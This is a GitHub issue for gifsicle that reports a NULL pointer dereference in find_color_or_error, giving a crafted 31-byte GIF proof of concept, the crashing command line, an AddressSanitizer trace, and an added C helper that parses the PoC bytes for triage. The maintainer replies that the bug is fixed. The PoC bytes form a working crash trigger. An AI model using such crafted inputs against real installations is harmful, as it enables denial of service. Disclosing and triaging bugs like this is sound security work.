NULL Pointer Dereference vulnerability in find_color_or_error function #140

Closed
Ch111p opened this issue Jul 17, 2019 · 1 comment
Ch111p commented Jul 17, 2019

In support.c line 1110, the gfcm could be a NULL pointer in some cases.
Here is the usage:
gifsicle -t 1 test.gif -o test1.gif
POC here:
\x47\x49\x46\x38\x39\x61\x01\x00\x21\xf9\x04\x01\x00\x00\x00\x00\x2c\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x01\x44\x00\x3b
Here is ASan's report:

ASAN:SIGSEGV
=================================================================
==105510== ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x0000004455e7 sp 0x7ffeda9eb800 bp 0x600e0000df80 T0)
AddressSanitizer can not provide additional info.
    #0 0x4455e6 (/home/lcy/gifsicle/gifsicle+0x4455e6)
    #1 0x44b496 (/home/lcy/gifsicle/gifsicle+0x44b496)
    #2 0x45af92 (/home/lcy/gifsicle/gifsicle+0x45af92)
    #3 0x45dedc (/home/lcy/gifsicle/gifsicle+0x45dedc)
    #4 0x40651e (/home/lcy/gifsicle/gifsicle+0x40651e)
    #5 0x7f86fba2ff44 (/lib/x86_64-linux-gnu/libc-2.19.so+0x21f44)
    #6 0x407cf4 (/home/lcy/gifsicle/gifsicle+0x407cf4)
==105510== ABORTING
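
A triage aid for the PoC in the report above, as an added example that is not part of the original issue or of gifsicle's code: it walks the quoted bytes and counts images that carry neither a global nor a local color table. That such an image is the case in which gfcm ends up NULL is an assumption, as is the lenient skipping of unrecognized bytes; `images_without_colormap` and its helpers are hypothetical names.

```c
#include <stdio.h>
#include <string.h>

/* PoC bytes exactly as quoted in the report (31 bytes). */
static const unsigned char poc[] = {
    0x47,0x49,0x46,0x38,0x39,0x61,0x01,0x00,0x21,0xf9,0x04,0x01,0x00,0x00,0x00,0x00,
    0x2c,0x00,0x00,0x00,0x00,0x01,0x00,0x01,0x00,0x00,0x02,0x01,0x44,0x00,0x3b };

/* Skip a chain of length-prefixed sub-blocks; 0 on success, -1 if truncated. */
static int skip_subblocks(const unsigned char *b, size_t n, size_t *p) {
    while (*p < n) {
        size_t len = b[(*p)++];
        if (len == 0) return 0;              /* block terminator */
        if (len > n - *p) return -1;
        *p += len;
    }
    return -1;
}

/* Skip a color table if the packed byte's top bit announces one.
   Returns 1 if present, 0 if absent, -1 if the table is truncated. */
static int skip_table(size_t n, size_t *p, unsigned char packed) {
    size_t sz = (size_t)3 << ((packed & 7) + 1);
    if (!(packed & 0x80)) return 0;
    if (sz > n - *p) return -1;
    *p += sz;
    return 1;
}

/* Count images with neither a local nor a global color table; -1 if malformed. */
int images_without_colormap(const unsigned char *b, size_t n) {
    size_t p = 13;                       /* 6-byte signature + 7-byte screen descriptor */
    int global, local, bare = 0;
    if (n < 13 || memcmp(b, "GIF8", 4) != 0) return -1;
    if ((global = skip_table(n, &p, b[10])) < 0) return -1;
    while (p < n) {
        unsigned char c = b[p++];
        if (c == 0x3b) return bare;      /* trailer */
        if (c == 0x21) {                 /* extension: label byte, then sub-blocks */
            if (p++ >= n || skip_subblocks(b, n, &p)) return -1;
        } else if (c == 0x2c) {          /* image descriptor: 9 bytes, packed byte last */
            if (n - p < 9) return -1;
            p += 9;
            if ((local = skip_table(n, &p, b[p - 1])) < 0) return -1;
            if (!global && !local) bare++;
            if (p++ >= n || skip_subblocks(b, n, &p)) return -1; /* LZW code size + data */
        }                                /* other bytes skipped (assumed lenient reader) */
    }
    return -1;                           /* ran off the end without a trailer */
}

int main(void) {
    printf("images without any color table: %d\n", images_without_colormap(poc, sizeof poc));
    return 0;
}
```
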
kohler commented Jul 17, 2019

This appears to be fixed in #140, thanks for the report!

@kohler kohler closed this as completed Jul 17, 2019